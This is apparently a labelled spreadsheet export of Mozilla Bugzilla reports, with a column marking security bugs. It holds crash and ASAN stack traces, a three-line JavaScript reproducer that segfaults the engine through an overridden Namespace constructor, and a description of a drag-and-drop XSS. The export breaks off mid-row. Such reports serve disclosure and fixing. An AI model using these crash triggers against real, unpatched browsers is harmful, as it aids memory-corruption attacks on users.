* thread #1: tid = 0x25761, 0x0000000101dde235 XUL`nsTArray_Impl&lt;unsigned int, nsTArrayInfallibleAllocator&gt;::ElementAt(this=0x000000012ffef488, aIndex=1) + 117 at nsTArray.h:984, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
  * frame #0: 0x0000000101dde235 XUL`nsTArray_Impl&lt;unsigned int, nsTArrayInfallibleAllocator&gt;::ElementAt(this=0x000000012ffef488, aIndex=1) + 117 at nsTArray.h:984
    frame #1: 0x0000000101dcb06d XUL`nsTArray_Impl&lt;unsigned int, nsTArrayInfallibleAllocator&gt;::operator[](this=0x000000012ffef488, aIndex=1) + 29 at nsTArray.h:1019
    frame #2: 0x0000000106e421c1 XUL`nsAutoCompleteController::ProcessResult(this=0x000000012ffef440, aSearchIndex=1, aResult=0x0000000128c4ad40) + 417 at nsAutoCompleteController.cpp:1544
    frame #3: 0x0000000106e41ff6 XUL`nsAutoCompleteController::HandleSearchResult(this=0x000000012ffef440, aSearch=0x000000012b31bd20, aResult=0x0000000128c4ad40) + 118 at nsAutoCompleteController.cpp:781
    frame #4: 0x0000000106e42803 XUL`nsAutoCompleteController::OnSearchResult(this=0x000000012ffef440, aSearch=0x000000012b31bd20, aResult=0x0000000128c4ad40) + 307 at nsAutoCompleteController.cpp:823
    frame #5: 0x0000000106e429d7 XUL`non-virtual thunk to nsAutoCompleteController::OnSearchResult(this=0x000000012ffef440, aSearch=0x000000012b31bd20, aResult=0x0000000128c4ad40) + 55 at nsAutoCompleteController.cpp:801
    frame #6: 0x0000000101f69cae XUL`::NS_InvokeByIndex(that=0x000000012ffef440, methodIndex=3, paramCount=2, params=0x00007fff5fbf5c60) + 558 at xptcinvoke_x86_64_unix.cpp:174
    frame #7: 0x0000000102f9e6b8 XUL`CallMethodHelper::Invoke(this=0x00007fff5fbf5c18) + 88 at XPCWrappedNative.cpp:2097
    frame #8: 0x0000000102f95691 XUL`CallMethodHelper::Call(this=0x00007fff5fbf5c18) + 257 at XPCWrappedNative.cpp:1414
    frame #9: 0x0000000102f73f4c XUL`XPCWrappedNative::CallMethod(ccx=0x00007fff5fbf5dc8, mode=CALL_METHOD) + 252 at XPCWrappedNative.cpp:1381
    frame #10: 0x0000000102f76027 XUL`XPC_WN_CallMethod(cx=0x0000000100384000, argc=2, vp=0x000000011cfd51c0) + 807 at XPCWrappedNativeJSOps.cpp:1126
    frame #11: 0x000000010877eb8d XUL`js::CallJSNative(cx=0x0000000100384000, native=(XUL`XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) at XPCWrappedNativeJSOps.cpp:1105), args=0x00007fff5fbf7f78)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) + 173 at jscntxtinlines.h:235
    frame #12: 0x000000010873d19b XUL`js::Invoke(cx=0x0000000100384000, args=0x00007fff5fbf7f78, construct=NO_CONSTRUCT) + 1163 at Interpreter.cpp:489
    frame #13: 0x00000001087560fa XUL`Interpret(cx=0x0000000100384000, state=0x00007fff5fbf9020) + 55914 at Interpreter.cpp:2798
    frame #14: 0x0000000108748595 XUL`js::RunScript(cx=0x0000000100384000, state=0x00007fff5fbf9020) + 725 at Interpreter.cpp:430
    frame #15: 0x000000010873d270 XUL`js::Invoke(cx=0x0000000100384000, args=0x00007fff5fbf9158, construct=NO_CONSTRUCT) + 1376 at Interpreter.cpp:507
    frame #16: 0x00000001085580e4 XUL`js::fun_call(cx=0x0000000100384000, argc=2, vp=0x00007fff5fbf9418) + 516 at jsfun.cpp:1192
    frame #17: 0x000000010877eb8d XUL`js::CallJSNative(cx=0x0000000100384000, native=(XUL`js::fun_call(JSContext*, unsigned int, JS::Value*) at jsfun.cpp:1174), args=0x00007fff5fbf93c0)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) + 173 at jscntxtinlines.h:235
    frame #18: 0x000000010873d19b XUL`js::Invoke(cx=0x0000000100384000, args=0x00007fff5fbf93c0, construct=NO_CONSTRUCT) + 1163 at Interpreter.cpp:489
    frame #19: 0x0000000108764167 XUL`js::Invoke(cx=0x0000000100384000, thisv=0x00007fff5fbf9a20, fval=0x00007fff5fbf94e0, argc=2, argv=0x00007fff5fbf9a28, rval=JS::MutableHandleValue @ 0x00007fff5fbf93b0) + 743 at Interpreter.cpp:542
    frame #20: 0x000000010868ea2e XUL`js::DirectProxyHandler::call(this=0x000000010bf346f0, cx=0x0000000100384000, proxy=JS::HandleObject @ 0x00007fff5fbf9508, args=0x00007fff5fbf9760) const + 254 at DirectProxyHandler.cpp:77
    frame #21: 0x000000010867fbc9 XUL`js::CrossCompartmentWrapper::call(this=0x000000010bf346f0, cx=0x0000000100384000, wrapper=JS::HandleObject @ 0x00007fff5fbf9610, args=0x00007fff5fbf9760) const + 521 at CrossCompartmentWrapper.cpp:289
    frame #22: 0x0000000108692e46 XUL`js::Proxy::call(cx=0x0000000100384000, proxy=JS::HandleObject @ 0x00007fff5fbf9700, args=0x00007fff5fbf9760) + 390 at Proxy.cpp:412
    frame #23: 0x0000000108694673 XUL`js::proxy_Call(cx=0x0000000100384000, argc=2, vp=0x00007fff5fbf9a18) + 211 at Proxy.cpp:710
    frame #24: 0x000000010877eb8d XUL`js::CallJSNative(cx=0x0000000100384000, native=(XUL`js::proxy_Call(JSContext*, unsigned int, JS::Value*) at Proxy.cpp:706), args=0x00007fff5fbf99c0)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) + 173 at jscntxtinlines.h:235
    frame #25: 0x000000010873d060 XUL`js::Invoke(cx=0x0000000100384000, args=0x00007fff5fbf99c0, construct=NO_CONSTRUCT) + 848 at Interpreter.cpp:477
    frame #26: 0x0000000108764167 XUL`js::Invoke(cx=0x0000000100384000, thisv=0x00007fff5fbf9cf0, fval=0x00007fff5fbf9d08, argc=2, argv=0x00007fff5fbf9f20, rval=JS::MutableHandleValue @ 0x00007fff5fbf99b0) + 743 at Interpreter.cpp:542
    frame #27: 0x0000000108b58b21 XUL`js::jit::DoCallFallback(cx=0x0000000100384000, frame=0x00007fff5fbf9f88, stub_=0x000000011f58b158, argc=2, vp=0x00007fff5fbf9f10, res=JS::MutableHandleValue @ 0x00007fff5fbf9db8) + 2449 at BaselineIC.cpp:9025
    frame #28: 0x0000000115fec00b
I'm not sure what is going on but it's pretty clear that we are not guarding the index before accessing the array [1]. Since we're only reading from the address this should not be too dangerous security wise but the next line concerns me... I don't know this code well enough and there is a chance that there is a sec crit bug as well here on the next line (I don't see why it's obvious that resultIndex is not out of bound as well), I'll mark it as a sec bug for now.
[1]: http://mxr.mozilla.org/mozilla-central/source/toolkit/components/autocomplete/nsAutoCompleteController.cpp#1544</t>
        </is>
      </c>
      <c r="X2697" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2698">
      <c r="A2698" t="n">
        <v>459313</v>
      </c>
      <c r="B2698" t="inlineStr">
        <is>
          <t>2008-10-09 15:09:28 -0700</t>
        </is>
      </c>
      <c r="C2698" t="inlineStr">
        <is>
          <t>QA companion uses wrong pref for determining tab opening behavior</t>
        </is>
      </c>
      <c r="D2698" t="inlineStr">
        <is>
          <t>2018-10-15 10:43:38 -0700</t>
        </is>
      </c>
      <c r="E2698" t="n">
        <v>1</v>
      </c>
      <c r="F2698" t="n">
        <v>1</v>
      </c>
      <c r="G2698" t="n">
        <v>6</v>
      </c>
      <c r="H2698" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2698" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J2698" t="inlineStr">
        <is>
          <t>QA Companion</t>
        </is>
      </c>
      <c r="K2698" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2698" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2698" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2698" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2698" t="inlineStr"/>
      <c r="Q2698" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2698" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2698" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2698" t="n">
        <v>1</v>
      </c>
      <c r="U2698" t="n">
        <v>0</v>
      </c>
      <c r="V2698" t="n">
        <v>4</v>
      </c>
      <c r="W2698" t="inlineStr">
        <is>
          <t>Bug 324164 is going to remove browser.link.open_external, since it always has the same value as browser.link.open_newwindow since at least Firefox 2.
The end result is that the code at:
http://mxr.mozilla.org/mozilla/search?string=browser.link.open_external&amp;find=extensions
needs to use browser.link.open_newwindow instead.</t>
        </is>
      </c>
      <c r="X2698" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2699">
      <c r="A2699" t="n">
        <v>1279814</v>
      </c>
      <c r="B2699" t="inlineStr">
        <is>
          <t>2016-06-12 12:05:09 -0700</t>
        </is>
      </c>
      <c r="C2699" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsBidi::BracketData::AddOpening</t>
        </is>
      </c>
      <c r="D2699" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:16 -0700</t>
        </is>
      </c>
      <c r="E2699" t="n">
        <v>1</v>
      </c>
      <c r="F2699" t="n">
        <v>1</v>
      </c>
      <c r="G2699" t="n">
        <v>3</v>
      </c>
      <c r="H2699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2699" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2699" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K2699" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L2699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2699" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2699" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q2699" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2699" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2699" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2699" t="n">
        <v>1</v>
      </c>
      <c r="U2699" t="n">
        <v>0</v>
      </c>
      <c r="V2699" t="n">
        <v>28</v>
      </c>
      <c r="W2699" t="inlineStr">
        <is>
          <t>Created attachment 8762415
firefox-heap-buffer-overflow-nsBidiBracketDataAddOpening.svg
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN-prebuild from https://ftp.mozilla.org/pub/firefox/tinderbox-builds/mozilla-central-linux64-asan/1465725740/
Repro-file as an attachment. Sorry for the large size of the file. My minimizer failed to to minimize it, because of some weird encoding issue. 
ASAN-trace:
=================================================================
==1043==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200070c92f at pc 0x7f56b71bc133 bp 0x7ffc090fca90 sp 0x7ffc090fca88
WRITE of size 128 at 0x60200070c92f thread T0 (Web Content)
    #0 0x7f56b71bc132 in nsBidi::BracketData::AddOpening(char16_t, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidi.cpp:669
    #1 0x7f56b71bcd99 in nsBidi::BracketData::ProcessChar(int, char16_t, unsigned char*, unsigned char*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidi.cpp:843
    #2 0x7f56b71b980e in nsBidi::ResolveExplicitLevels(nsBidiDirection*, char16_t const*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidi.cpp:1175
    #3 0x7f56b71b7c9b in nsBidi::SetPara(char16_t const*, int, unsigned char) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidi.cpp:310
    #4 0x7f56b71c2f46 in SetPara /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidiPresUtils.cpp:210
    #5 0x7f56b71c2f46 in nsBidiPresUtils::ResolveParagraph(nsBlockFrame*, BidiParagraphData*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidiPresUtils.cpp:702
    #6 0x7f56b71c0802 in ResolveParagraphWithinBlock /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidiPresUtils.cpp:1247
    #7 0x7f56b71c0802 in nsBidiPresUtils::TraverseFrames(nsBlockFrame*, nsBlockInFlowLineIterator*, nsIFrame*, BidiParagraphData*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidiPresUtils.cpp:1146
    #8 0x7f56b71bf16a in nsBidiPresUtils::Resolve(nsBlockFrame*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsBidiPresUtils.cpp:673
    #9 0x7f56b745a2e7 in ResolveBidi /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:7516
    #10 0x7f56b745a2e7 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1110
    #11 0x7f56b74788e2 in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockReflowContext.cpp:306
    #12 0x7f56b746eb97 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3392
    #13 0x7f56b746196a in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2751
    #14 0x7f56b746196a in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2290
    #15 0x7f56b745a6b7 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1171
    #16 0x7f56b74b8e1b in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:1022
    #17 0x7f56b74b763e in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:644
    #18 0x7f56b75546a7 in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:1022
    #19 0x7f56b75546a7 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:541
.
.
.</t>
        </is>
      </c>
      <c r="X2699" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2700">
      <c r="A2700" t="n">
        <v>465424</v>
      </c>
      <c r="B2700" t="inlineStr">
        <is>
          <t>2008-11-17 15:04:10 -0800</t>
        </is>
      </c>
      <c r="C2700" t="inlineStr">
        <is>
          <t>TM: issue with post-decrement operator</t>
        </is>
      </c>
      <c r="D2700" t="inlineStr">
        <is>
          <t>2009-01-16 00:22:36 -0800</t>
        </is>
      </c>
      <c r="E2700" t="n">
        <v>1</v>
      </c>
      <c r="F2700" t="n">
        <v>1</v>
      </c>
      <c r="G2700" t="n">
        <v>3</v>
      </c>
      <c r="H2700" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2700" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2700" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2700" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2700" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2700" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2700" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2700" t="inlineStr"/>
      <c r="Q2700" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2700" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2700" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2700" t="n">
        <v>1</v>
      </c>
      <c r="U2700" t="n">
        <v>0</v>
      </c>
      <c r="V2700" t="n">
        <v>9</v>
      </c>
      <c r="W2700" t="inlineStr">
        <is>
          <t>js&gt; for (let j=0;j&lt;5;++j) { jj=j; print('' + (jj--)) }
0
1
2
2
3
"2" shouldn't be repeated!</t>
        </is>
      </c>
      <c r="X2700" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2701">
      <c r="A2701" t="n">
        <v>444608</v>
      </c>
      <c r="B2701" t="inlineStr">
        <is>
          <t>2008-07-10 09:47:46 -0700</t>
        </is>
      </c>
      <c r="C2701" t="inlineStr">
        <is>
          <t>SM: jsxml.c assumes that Namespace and QName are read-only</t>
        </is>
      </c>
      <c r="D2701" t="inlineStr">
        <is>
          <t>2009-03-02 00:44:38 -0800</t>
        </is>
      </c>
      <c r="E2701" t="n">
        <v>1</v>
      </c>
      <c r="F2701" t="n">
        <v>1</v>
      </c>
      <c r="G2701" t="n">
        <v>3</v>
      </c>
      <c r="H2701" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2701" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2701" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2701" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2701" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2701" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2701" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2701" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2701" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2701" t="n">
        <v>1</v>
      </c>
      <c r="U2701" t="n">
        <v>0</v>
      </c>
      <c r="V2701" t="n">
        <v>34</v>
      </c>
      <c r="W2701" t="inlineStr">
        <is>
          <t>jsxml.c contains 3 fragments like:
    nsobj = CallConstructorFunction(cx, obj, &amp;js_NamespaceClass.base, 1,
                                    vp + 2);
...
    nameobj = CallConstructorFunction(cx, obj, &amp;js_QNameClass.base, 1, &amp;name);
    if (!nameobj)
        return JS_FALSE;
with CallConstructorFunction defined as:
static JSObject *
CallConstructorFunction(JSContext *cx, JSObject *obj, JSClass *clasp,
                        uintN argc, jsval *argv)
{
...
    if (!JS_CallFunctionName(cx, obj, clasp-&gt;name, argc, argv, &amp;rval))
        return NULL;
    JS_ASSERT(!JSVAL_IS_PRIMITIVE(rval));
    return JSVAL_TO_OBJECT(rval);
}
Here the code assumes that Namespace and QName at the global scope point to the default native constructors. Since both Namespace and QName are not read-only, this can be trivially used to crush the engine on a de-reference of a script-supplied address:
~/m/20-ff/js/src&gt; cat ~/s/x.js
var x = &lt;xml/&gt;;
Namespace = function() { return 10; };
x.addNamespace("x");
~/m/20-ff/js/src&gt; ./Linux_All_OPT.OBJ/js ~/s/x.js
Segmentation fault</t>
        </is>
      </c>
      <c r="X2701" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2702">
      <c r="A2702" t="n">
        <v>475276</v>
      </c>
      <c r="B2702" t="inlineStr">
        <is>
          <t>2009-01-25 13:32:59 -0800</t>
        </is>
      </c>
      <c r="C2702" t="inlineStr">
        <is>
          <t>Some of l10n mozilla-central directory not removed on clobber, breaks subsequent builds</t>
        </is>
      </c>
      <c r="D2702" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2702" t="n">
        <v>1</v>
      </c>
      <c r="F2702" t="n">
        <v>1</v>
      </c>
      <c r="G2702" t="n">
        <v>5</v>
      </c>
      <c r="H2702" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2702" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2702" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2702" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2702" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2702" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N2702" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2702" t="inlineStr"/>
      <c r="Q2702" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2702" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2702" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2702" t="n">
        <v>1</v>
      </c>
      <c r="U2702" t="n">
        <v>0</v>
      </c>
      <c r="V2702" t="n">
        <v>56</v>
      </c>
      <c r="W2702" t="inlineStr">
        <is>
          <t>This has happened several times.  Example logs:
http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla-l10n-fa/1232766067.1232766095.8031.gz
http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla-l10n-fa/1232852472.1232852500.24900.gz
http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla-l10n-fa/1232895733.1232895749.4148.gz
Error message:
autoconf: configure.in: No such file or directory</t>
        </is>
      </c>
      <c r="X2702" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2703">
      <c r="A2703" t="n">
        <v>520189</v>
      </c>
      <c r="B2703" t="inlineStr">
        <is>
          <t>2009-10-02 09:28:09 -0700</t>
        </is>
      </c>
      <c r="C2703" t="inlineStr">
        <is>
          <t>Copy-and-paste or drag-and-drop into designMode document allows XSS</t>
        </is>
      </c>
      <c r="D2703" t="inlineStr">
        <is>
          <t>2011-04-07 07:24:58 -0700</t>
        </is>
      </c>
      <c r="E2703" t="n">
        <v>1</v>
      </c>
      <c r="F2703" t="n">
        <v>1</v>
      </c>
      <c r="G2703" t="n">
        <v>3</v>
      </c>
      <c r="H2703" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2703" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2703" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2703" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2703" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2703" t="inlineStr">
        <is>
          <t>[sg:moderate][needs bug 572642 for branch] cross-browser issue</t>
        </is>
      </c>
      <c r="Q2703" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2703" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2703" t="inlineStr">
        <is>
          <t>mozilla2.0b1</t>
        </is>
      </c>
      <c r="T2703" t="n">
        <v>1</v>
      </c>
      <c r="U2703" t="n">
        <v>0</v>
      </c>
      <c r="V2703" t="n">
        <v>90</v>
      </c>
      <c r="W2703" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Build Identifier: 
An IFRAME with its src attribute set to a data URI can be dragged into a
designMode area. The data URI renders an HTML link that, if clicked, will execute some JavaScript. If a selection containing
such an IFRAME is dragged between two different domains, the JavaScript will
execute in the context of the domain where it is dropped. If an attacker can
get a user to perform a drag and drop operation, it is possible to perform XSS
on sites that use the designMode feature.
Webkit and Internet Explorer are affected by similar bugs, which I have reported in the relevant places.
Reproducible: Always
Steps to Reproduce:
See testcase</t>
        </is>
      </c>
      <c r="X2703" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2704">
      <c r="A2704" t="n">
        <v>1174353</v>
      </c>
      <c r="B2704" t="inlineStr">
        <is>
          <t>2015-06-12 16:04:45 -0700</t>
        </is>
      </c>
      <c r="C2704" t="inlineStr">
        <is>
          <t>HTTP 500 INTERNAL SERVER ERROR in Review Board</t>
        </is>
      </c>
      <c r="D2704" t="inlineStr">
        <is>
          <t>2016-02-21 20:31:38 -0800</t>
        </is>
      </c>
      <c r="E2704" t="n">
        <v>1</v>
      </c>
      <c r="F2704" t="n">
        <v>1</v>
      </c>
      <c r="G2704" t="n">
        <v>6</v>
      </c>
      <c r="H2704" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2704" t="inlineStr">
        <is>
          <t>MozReview Graveyard</t>
        </is>
      </c>
      <c r="J2704" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2704" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2704" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2704" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2704" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2704" t="inlineStr"/>
      <c r="Q2704" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2704" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2704" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2704" t="n">
        <v>1</v>
      </c>
      <c r="U2704" t="n">
        <v>0</v>
      </c>
      <c r="V2704" t="n">
        <v>25</v>
      </c>
      <c r="W2704" t="inlineStr">
        <is>
          <t>Got this error on https://reviewboard.mozilla.org/r/10713/# after pushing a bunch of mq patches to review for the third time (first push had been published and reviewed with r+. Second push was pending with one additional patch and never published. I fixed one more bug and pushed a third time. The error seems permanent. :-( Error:
Well, this is embarassing...
Something's gone wrong in either retrieving or manipulating these review requests. Sorry about that. Please consider filing a bug, and including the following information:
HTTP 500 INTERNAL SERVER ERROR
reportError@https://reviewboard.mozilla.org/static/ext/mozreview.extension.MozReviewExtension/js/reviews.min.eb256efb84ea.js:1:1163
CommitListView&lt;.initialize/&lt;.error@https://reviewboard.mozilla.org/static/ext/mozreview.extension.MozReviewExtension/js/reviews.min.eb256efb84ea.js:1:8754
RB.DraftResourceModelMixin._retrieveDraft/&lt;.error@https://reviewboard.mozilla.org/static/rb/js/base.min.6b96c3eb4ed5.js:1:29663
R/e.error@https://reviewboard.mozilla.org/static/lib/js/3rdparty.min.41a088aa2665.js:4:12836
RB.BaseResource&lt;.sync/syncOptions.error&lt;@https://reviewboard.mozilla.org/static/rb/js/base.min.6b96c3eb4ed5.js:1:26320
p.Callbacks/k@https://reviewboard.mozilla.org/static/lib/js/jquery-1.8.2.min.cfa9051cc0b0.js:2:16915
p.Callbacks/l.fireWith@https://reviewboard.mozilla.org/static/lib/js/jquery-1.8.2.min.cfa9051cc0b0.js:2:17707
y@https://reviewboard.mozilla.org/static/lib/js/jquery-1.8.2.min.cfa9051cc0b0.js:2:80827
.send/d@https://reviewboard.mozilla.org/static/lib/js/jquery-1.8.2.min.cfa9051cc0b0.js:2:86374
Stack
Close</t>
        </is>
      </c>
      <c r="X2704" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2705">
      <c r="A2705" t="n">
        <v>1274303</v>
      </c>
      <c r="B2705" t="inlineStr">
        <is>
          <t>2016-05-19 08:31:43 -0700</t>
        </is>
      </c>
      <c r="C2705" t="inlineStr">
        <is>
          <t>GCLI 'inspect' command doesn't work anymore</t>
        </is>
      </c>
      <c r="D2705" t="inlineStr">
        <is>
